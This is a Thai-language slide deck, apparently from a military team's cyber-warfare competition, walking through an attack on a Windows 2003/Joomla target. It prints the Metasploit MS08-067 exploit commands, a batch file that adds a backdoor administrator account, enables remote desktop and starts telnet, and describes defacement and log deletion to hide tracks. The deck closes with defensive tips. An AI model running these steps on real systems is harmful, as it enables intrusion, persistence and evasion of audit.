งานนำเสนอกำลังจะดาวน์โหลด โปรดรอ

งานนำเสนอกำลังจะดาวน์โหลด โปรดรอ

CYBER WARFARE PIRATE CYBER WING 46 TEAM.

งานนำเสนอที่คล้ายกัน


งานนำเสนอเรื่อง: "CYBER WARFARE PIRATE CYBER WING 46 TEAM."— ใบสำเนางานนำเสนอ:

1 CYBER WARFARE PIRATE CYBER WING 46 TEAM

2 ข้อมูลพื้นฐานของทีม PIRATE CYBER
สมาชิกทีม สัญลักษณ์ทีม หัวหน้าทีม นาวาอากาศตรี ธนารักษ์ ธูปมงคล สมาชิกทีม จ่าอากาศเอก ทรงวุฒิ อินทรา จ่าอากาศเอก รักษิต ทองแย้ม

3 ขั้นตอนการวางแผนในการแข่งขัน
น.ต.ธนารักษ์ ธูปมงคล หัวหน้าทีม Analysis & Assignments. Reconnaissance Scanning Gaining Access Maintaining Access Clearling Track Report จ.อ.ทรงวุฒิ อินทรา จ.อ.รักษิต ทองแย้ม

4 ข้อมูลอ้างอิงในการค้นคว้าเพิ่มเติม
1. 2. 3. 4. 5. หนังสือ Hacking & Security ก้าวสู่นักทดสอบและป้องกันการเจาะระบบ 6. ใช้ในการถอดรหัสข้อมูล 7. ใช้ในการถอดรหัสข้อมูล

5 ขั้นตอนการปฏิบัติ เก็บรวบรวมข้อมูลเครื่องเป้าหมาย
1. Nmap ใช้ในการสแกนหาช่องโหว่และรายละเอียดของเครื่องเป้าหมาย 2. Acunetix web vulnerability scanner ใช้ในการตรวจสอบช่องโหว่ของ เว็บไซต์เป้าหมาย 3. Jomscan ใช้ในการตรวจสอบช่องโหว่ของโปรแกรม cms Joomla

6 Nmap Scan IP Address: OS: windows 2003 Enterprise Edition OS version: Service Pack 2 Open Port: 135,139,445,514,1026,3306 Web Server: Apache Web Server version: 2.2.8 Available service: Website language: PHP CMS name: Joomla CMS version: 1.5 ทำการสำรวจและเก็บรวมรวมข้อมูลและหาช่องทางในการโจมตีเป้าหมาย

7 Acunetix web vulnerability scanner

8 Jomscan # 1 Info -> Generic: htaccess.txt has not been renamed. Versions Affected: Any Check: /htaccess.txt Exploit: Generic defenses implemented in .htaccess are not available, so exploiting is more likely to succeed. Vulnerable? Yes # 2 Info -> Generic: Unprotected Administrator directory Check: /administrator/ Exploit: The default /administrator directory is detected. Attackers can bruteforce administrator accounts. Read:

9 # 14 Info -> Core: Admin Backend Cross Site Request Forgery Vulnerability Versions effected: <= Check: /administrator/ Exploit: It requires an administrator to be logged in and to be tricked into a specially crafted webpage. Vulnerable? Yes # 19 Info -> CorePlugin: TinyMCE TinyBrowser addon multiple vulnerabilities Versions effected: Joomla! Check: /plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/ Exploit: While Joomla! team announced only File Upload vulnerability, in fact there are many. See: # 35 Info -> CoreComponent: com_mailto timeout Vulnerability Versions effected: <= Check: /components/com_mailto/ Exploit: [Requires a valid user account] In com_mailto, it was possible to bypass timeout protection against sending automated s.

10 ขั้นตอนการปฏิบัติ ช่องโหว่ของ Server 1. ms08_067_netapi
เมื่อเราเก็บรวบรวมรายละเอียดเครื่องเป้าหมายแล้ว จึงใช้ช่องโหว่ของเซิร์ฟเวอร์เพื่อทำการเจาะระบบ ช่องโหว่ของ Server 1. ms08_067_netapi

11 ขั้นตอนการปฏิบัติ เลือกใช้ช่องโหว่ ms08_067_netapi msfconsole
msfconsole msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > show options msf exploit(ms08_067_netapi) > set RHOST msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp msf exploit(ms08_067_netapi) > exploit

12 ขั้นตอนการปฏิบัติ เมื่อ exploit เครื่องเป้าหมายได้สำเร็จ จะทำการอัพโหลดไฟล์ไปยังเครื่องเป้าหมายที่ต้องการ meterpreter > upload /root/openport.bat ./ ทำการเรียกใช้ไฟล์ที่เราอัพโหลดไว้ที่เครื่องเป้าหมาย

13 ขั้นตอนการปฏิบัติ คำสั่งที่ใช้ในไฟล์ที่อัพโหลดเข้าสู่เครื่องเป้าหมาย
1. net user ntadmin test1234 /add 2. net localgroup administrators ntadmin /add 3. netsh firewall set service type = remoteadmin mode = enable REG.exe ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v netsh firewall set service type = remotedesktop mode = enable 4. sc config TlntSvr start= auto sc start TlntSvr

14 ภาพหน้าจอการปฏิบัติ

15 ใช้ Remote Desktop ในการเข้าถึงเป้าหมายหลังจาก Add user
คุณสมบัติ = Admin

16

17 โจมตีระบบโดยการเปลี่ยนแปลงหน้าเว็บไซต์

18 ทำการสร้าง Backdoor โดยเชื่อมต่อผ่านทาง Telnet

19 ทำการลบ Log เพื่อกลบร่องรอย

20 ตั้งค่าไม่ให้บันทึก Log

21 เข้าลบไฟล์ Log ของเว็บเซิร์ฟเวอร์

22 ตั้งค่าใน Config เว็บเซิร์ฟเวอร์ไม่ให้บันทึก Log

23 ข้อมูลลับที่จะนำไป Decode

24 “Wanna make the world dance Forget about the price tag”
ถอดรหัสข้อมูล BASE64 : VjJGdWJtRWdiV0ZyWlNCMGFHVWdkMjl5YkdRZ1pHRnVZMlVnUm05eVoyVjBJR0ZpYjNWMElIUm9aU0J3Y21salpTQjBZV2M9 V2FubmEgbWFrZSB0aGUgd29ybGQgZGFuY2UgRm9yZ2V0IGFib3V0IHRoZSBwcmljZSB0YWc= “Wanna make the world dance Forget about the price tag” MD5 : 7a0e07052fcc314476d1a61040f189b8 “flyboard”

25 Website ในการ Decode

26 Website ในการ Decode

27 แนวทางในการป้องกันการถูกโจมตี
1. อัพเดตแพตช์ (Patch) เป็นประจำ 2. เปลี่ยนแปลงแก้ไข Configuration ของระบบเสียใหม่ 3. ไม่ควรมีข้อมูลส่วนตัวในรหัสผ่าน เช่น ชื่อ หมายเลขโทรศัพท์ วันเกิด 4. ไม่ควรเขียนรหัสผ่านไว้บนแผ่นกระดาษแล้วเก็บไว้ในที่ ๆ หาได้ง่าย 5. ไม่ควรตั้งรหัสผ่านที่สั้น เช่น XYZ, abc, 1234, 6. ไม่ควรใช้คำที่รู้จักและคุ้นเคย เช่น password, admin 7. ไม่ควรใช้รหัสผ่านเดียวกันกับทุกๆ ระบบที่ใช้ 8. ติดตั้งโปรแกรมสแกนไวรัส และอัพเดตฐานข้อมูลเป็นประจำ 9. ไม่ควรติดตั้งไฟล์ที่ไม่มีที่มาหรือไม่น่าเชื่อถือ 10.ไม่ควรเปิด Port ที่ไม่ได้ใช้งาน

28 ตอบข้อซักถาม และข้อเสนอแนะ
PIRATE CYBER WING 46 TEAM


ดาวน์โหลด ppt CYBER WARFARE PIRATE CYBER WING 46 TEAM.

งานนำเสนอที่คล้ายกัน


Ads by Google